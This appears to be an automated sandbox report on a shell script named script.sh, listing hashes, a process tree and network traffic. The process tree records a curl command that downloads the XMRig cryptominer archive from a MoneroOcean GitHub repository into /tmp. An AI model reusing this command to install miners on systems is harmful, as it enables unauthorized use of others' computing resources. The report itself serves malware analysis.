Analysis

  • max time kernel
    300s
  • max time network
    897s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    01/07/2024, 11:25 UTC

General

  • Target

    script.sh

  • Size

    8KB

  • MD5

    97423634cc1762b2f010cb860e7fb47d

  • SHA1

    2f50775e8fe9ab98a80f06d835c5874091bf0b3e

  • SHA256

    d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd

  • SHA512

    bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f

  • SSDEEP

    192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Processes

  • /tmp/script.sh
    /tmp/script.sh
    PID:1497
    • /usr/bin/cut
      cut -f1 -d.
      PID:1500
    • /usr/bin/nproc
      nproc
      PID:1501
    • /usr/bin/bc
      bc -l
      PID:1504
    • /usr/bin/curl
      curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
      PID:1505

            Network

            • US
              DNS
              raw.githubusercontent.com
              Remote address:
              1.1.1.1:53
              Request
              raw.githubusercontent.com
              IN A
              Response
              raw.githubusercontent.com
              IN A
              185.199.109.133
              raw.githubusercontent.com
              IN A
              185.199.111.133
              raw.githubusercontent.com
              IN A
              185.199.110.133
              raw.githubusercontent.com
              IN A
              185.199.108.133
            • US
              DNS
              raw.githubusercontent.com
              Remote address:
              1.1.1.1:53
              Request
              raw.githubusercontent.com
              IN AAAA
              Response
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8003::154
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8000::154
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8002::154
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8001::154
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
              Response
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
              Response
            • GB
              GET
              http://connectivity-check.ubuntu.com/
              Remote address:
              185.125.190.96:80
              Request
              GET / HTTP/1.1
              Host: connectivity-check.ubuntu.com
              Accept: */*
              Connection: close
              Response
              HTTP/1.1 204 No Content
              server: nginx/1.18.0 (Ubuntu)
              date: Mon, 01 Jul 2024 11:29:09 GMT
              x-cache-status: from content-cache/0
              x-networkmanager-status: online
              connection: close
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
              Response
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
              Response
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
            • US
              GET
              http://connectivity-check.ubuntu.com/
              Remote address:
              91.189.91.98:80
              Request
              GET / HTTP/1.1
              Host: connectivity-check.ubuntu.com
              Accept: */*
              Connection: close
              Response
              HTTP/1.1 204 No Content
              server: nginx/1.18.0 (Ubuntu)
              date: Mon, 01 Jul 2024 11:34:09 GMT
              x-cache-status: from content-cache/2
              x-networkmanager-status: online
              connection: close
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
              Response
            • US
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
              Response
            • US
              GET
              http://connectivity-check.ubuntu.com/
              Remote address:
              91.189.91.48:80
              Request
              GET / HTTP/1.1
              Host: connectivity-check.ubuntu.com
              Accept: */*
              Connection: close
              Response
              HTTP/1.1 204 No Content
              server: nginx/1.14.0 (Ubuntu)
              date: Mon, 01 Jul 2024 11:39:09 GMT
              x-cache-status: from content-cache-1ss/0
              x-networkmanager-status: online
              connection: close
            • 185.125.188.61:443
              tls
              135 B
              2
            • 185.125.188.61:443
              tls
              135 B
              2
            • 151.101.193.91:443
              tls, https
              466 B
              40 B
              2
              1
            • 151.101.193.91:443
              extensions.gnome.org
              tls
              6.1kB
              222.0kB
              108
              172
            • 195.181.164.14:443
              tls, https
              2.5kB
              11
            • 185.125.190.96:80
              http://connectivity-check.ubuntu.com/
              http
              355 B
              401 B
              5
              4

              HTTP Request

              GET http://connectivity-check.ubuntu.com/

              HTTP Response

              204
            • 91.189.91.98:80
              http://connectivity-check.ubuntu.com/
              http
              419 B
              389 B
              6
              4

              HTTP Request

              GET http://connectivity-check.ubuntu.com/

              HTTP Response

              204
            • 91.189.91.48:80
              http://connectivity-check.ubuntu.com/
              http
              407 B
              405 B
              6
              4

              HTTP Request

              GET http://connectivity-check.ubuntu.com/

              HTTP Response

              204
            • 1.1.1.1:53
              raw.githubusercontent.com
              dns
              82 B
              146 B
              1
              1

              DNS Request

              raw.githubusercontent.com

              DNS Response

              185.199.109.133
              185.199.111.133
              185.199.110.133
              185.199.108.133

            • 1.1.1.1:53
              raw.githubusercontent.com
              dns
              82 B
              194 B
              1
              1

              DNS Request

              raw.githubusercontent.com

              DNS Response

              2606:50c0:8003::154
              2606:50c0:8000::154
              2606:50c0:8002::154
              2606:50c0:8001::154

            • 224.0.0.251:5353
              292 B
              4
            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
              278 B
              1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
              422 B
              1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              172 B
              278 B
              2
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              172 B
              422 B
              2
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
              278 B
              1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
              422 B
              1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response
